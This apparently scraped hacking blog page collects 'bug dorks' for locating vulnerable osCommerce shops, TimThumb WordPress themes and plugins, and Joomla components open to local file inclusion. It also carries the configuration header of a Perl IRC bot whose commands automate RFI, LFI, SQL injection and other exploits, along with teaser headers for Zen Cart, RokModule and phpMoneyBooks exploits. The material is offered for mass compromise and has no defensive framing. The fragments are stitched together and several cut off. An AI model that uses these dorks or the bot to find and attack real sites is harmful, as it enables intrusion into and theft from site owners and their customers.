bug dork OScommerce new

!osco "creat new account.php" *shop by
!osco "by oscommerce" +payment by
!osco reviews.php *by oscommerce
!osco /admin/login.php  *catalog *osc
!osco new_product.php *online store
!osco contact_us.php *site:.com
!osco /catalog/classes *site:.au

!osco /index.php?osCsid= M�chten Sie sich anmelden
!osco "specials.php?osCsid=" Get Them While They Are Hot.
!osco "Powered by osCommerce" "/osc/catalog/"
!osco "*.php?osCsid=" shop by
!osco "*.php?osCsid=" catalog by
!osco "*.php?cPath=" Powered by
!osco "*.php?cPath=" Hacked by
!osco "by oscommerce" online shop.
!osco "*.php?osCsid=" catalog

Boot perl Multi (tim,osco,e107,sql dll )

#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;       

my $datetime = localtime;

my $fakeproc   = "/usr/bin/perl"; 
my $ircserver   = "irc.server.org";
my $ircport   = "6667";
my $nickname   = "DJok";
my $ident     = "wantexz";
my $channel   = "#wantexz";
my $admin     = "wantexz";
my $fullname   = "wantexz";

my $zenlogo   = " 15( 4@ 12zen 15)";
my $lfilogo   = " 15( 4@ 12LFI 15)";
my $rfilogo   = " 15( 4@ 12RFI 15)";
my $e107logo  = " 15( 4@ 12E107 15)";
my $xmllogo   = " 15( 4@ 12XML 15)";
my $sqllogo   = " 15( 4@ 12SQL 15)";
my $oscologo   = " 15( 4@ 12OsCo 15)";
my $timologo   = " 15( 4@ 12Timthumb 15)";

my $rficmd    = '!rfi';
my $lficmd    = '!lfi';
my $xmlcmd    = '!xml';
my $zencmd    = '!zen';
my $sqlcmd    = '!sql';
my $e107cmd   = '!e107';
my $oscocmd   = '!osc';
my $timcmd    = '!tim';
my $cmdxml    = '!cmdxml';
my $cmdlfi    = '!cmdlfi';
my $cmde107   = '!cmde107';


Download

dork osco 2013

.osc /catalog/classes
.osc /images/product_info.php
.osc /oscommerce/images/product_info.php
.osc /oscommerce/product_info.php
.osc "*.php?14" osc
.osc shop "My Account | Cart Contents | Checkout
.osc "by oscommerce" +web
.osc "by oscommerce" +"/shop/"
.osc "/index" "by oscommerce" +nl
.osc "/index" "by oscommerce" +ru
.osc "/admin/file_manager.php"
.osc index.php?cPath= ".com"
.osc "/asc/"+"Hard Drives"
.osc /checkout_shipping.php?osCsid=
.osc /oscommerce/catalog/ +Willkommen Gast.
.osc /oscommerce/catalog/ +Welcome Guest.
.osc index.php catalog "Powered by osCommerce"
.osc by osCommerce" /oscommerce2/catalog/
.osc /index.php?osCsid= M�chten Sie sich anmelden
.osc "specials.php?osCsid=" Get Them While They Are Hot.
.osc "Powered by osCommerce" "/osc/catalog/"

==== Baca selengkapnya ====

Dork timthumb new 2013

!tim /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/themes/cadabrapress/scripts/"
!tim /wp-content/themes/Avenue/timthumb.php "Avenue. All rights reserved."
!tim /wp-content/themes/thedawn/lib/scripts/timthumb.php "thedawn"
!tim /wp-content/themes/suffusion/timthumb.php "suffusion"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/widescreen/includes/timthumb.php "hide menu"
!tim /wp-content/themes/Nyke/timthumb.php "Nyke"


REadme 

Dork Osco

!osco "creat new account" +catalog
!osco "by oscommerce" +payment by
!osco reviews.php *by oscommerce
!osco /admin/login.php  *catalog *osc
!osco new_product.php *catalog
!osco contact_us.php *site:.tw
!osco /catalog/classes

read more

Bug Dork timthumb new

!tim /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/themes/cadabrapress/scripts/"
!tim /wp-content/themes/Avenue/timthumb.php "Avenue. All rights reserved."
!tim /wp-content/themes/thedawn/lib/scripts/timthumb.php "thedawn"
!tim /wp-content/themes/suffusion/timthumb.php "suffusion"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/widescreen/includes/timthumb.php "hide menu"
!tim /wp-content/themes/Nyke/timthumb.php "Nyke"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress theme by Sayontan Sinha"
!tim wp-content/themes/kingsize/timthumb.php "hide the navigation"
!tim wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs � Sitemap � Privacy Policy"
!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"

Joomla spider calendar lite Remote Exploit

Joomla spider calendar lite Remote Exploit

 dork: inurl:com_spidercalendar
 
 Date: [29-08-2012]
 site: http://poisonsecurity.wordpress.com/
 Vendor: http://web-dorado.com/products/spider-calendar-lite.html
 
 Version: Last
 
 License: Non-Commercial

 Download: http://web-dorado.com/products/spider-calendar-lite.html
 

Component RokModule Blind SQLi

Joomla Component RokModule Blind SQLi [module] Vulnerability

Nombre del Componente: Com_rokmodule

Empresa: http://www.rockettheme.com/

Testeado: Linux Backtrack

Zen Cart 1.3.8 Remote SQL Execution

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#

phpMoneyBooks Local File Inclusion

phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - mark.stanislav@gmail.com
I. DESCRIPTION
---------------------------------------
A vulnerability exists in index.php for module handling that allows for local file inclusion using
a null-byte attack on the 'module' GET parameter.
 II. TESTED VERSION
---------------------------------------
1.0.2
III. PoC EXPLOIT

New Dork timthumb

wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/wp-mobile-detector/timthumb.php
wp-content/plugins/wp-pagenavi/functions/timthumb.php
wp-content/plugins/wp-pagenavi/inc/timthumb.php
wp-content/plugins/wp-pagenavi/scripts/timthumb.php
wp-content/plugins/wp-pagenavi/timthumb.php
wp-content/plugins/wps3slider/scripts/timthumb.php
wp-content/plugins/wp-slick-slider/includes/timthumb/timthumb.php
wp-content/plugins/wptap-news-press-themeplugin-for-iphone/include/timthumb.php
wp-content/plugins/wp-thumbie/timthumb.php
wp-content/plugins/yd-export2email/timthumb.php
wp-content/plugins/yd-recent-posts-widget/timthumb/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/wp-pagenavi/timthumb.php

Bug,dork ,timthumb

wp-content/themes/themorningafter/tools/timthumb.php
wp-content/themes/OnTheGo/tools/timthumb.php
wp-content/themes/irresistible/tools/timthumb.php
wp-content/themes/Bold/tools/timthumb.php
wp-content/themes/busybee/tools/timthumb.php
wp-content/themes/Apz/tools/timthumb.php
wp-content/themes/Polished/tools/timthumb.php
wp-content/themes/postcard/tools/timthumb.php
wp-content/themes/TheCorporation/tools/timthumb.php
wp-content/themes/TheSource/tools/timthumb.php
wp-content/themes/openair/tools/timthumb.php
wp-content/themes/mymag/tools/timthumb.php
wp-content/themes/cityguide/tools/timthumb.php
wp-content/themes/object/tools/timthumb.php
wp-content/themes/Magnificent/tools/timthumb.php

Bug Dork Lfi

 /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
 /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
 /index.php?option=com_sbsfile&controller= "com_sbsfile"
 /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
 /index.php?option=com_sectionex&controller= "com_sectionex"
 /index.php?option=com_ganalytics&controller= "com_ganalytics"
 /index.php?option=com_janews&controller= "com_janews"
 /index.php?option=com_linkr&controller= "com_linkr"
 /index.php?option=com_rpx&controller= "com_rpx"
 /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
 /index.php?option=com_gcalendar&controller= "com_gcalendar"
 /index.php?option=com_ckforms&controller= "com_ckforms"